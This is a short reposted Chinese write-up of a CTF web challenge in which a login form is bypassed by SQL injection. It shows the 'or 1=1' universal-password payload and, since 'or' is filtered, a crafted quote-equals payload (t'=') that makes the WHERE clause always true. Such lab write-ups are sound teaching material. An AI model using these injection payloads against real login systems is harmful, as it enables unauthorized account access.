實驗吧web-登入一下好嗎

本文轉載自查看原文 2017-10-24 19:09 1371

鏈接： http://ctf5.shiyanbar.com/web/wonderkun/web/index.html

拿到題目第一反應是SQL注入題，但是卻找不到注入點，根據題目的意思，我們萬能密碼('or 1=1 or '1)登入一下

發現or已經被過濾掉了，換成大寫也是這樣

然后就開始想自己構造繞語句

sql查詢語句： select ,,, from ,,, where username=' 　　' and password='　　';

構造username=t'=' password=t'='

分析：select ,,, from ,,, where username='t'=' 'and password='t'='';這是一個永真的式子。

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 Ubuntu輸入密碼之后，桌面閃一下黑屏，然后又返回到輸入密碼界面。但是其他賬戶可以登入實驗吧Web-天網管理系統 gitlab web登入密碼忘記以后可以用如下方式修改密碼爬蟲實現免登入 uniapp保持自動登入入坑python 自己寫的小工具，紀念一下密鑰登入虛擬機ssh Android 注冊登入界面完美設計 python獲取淘寶登入cookies php用戶登入與注銷(cookie)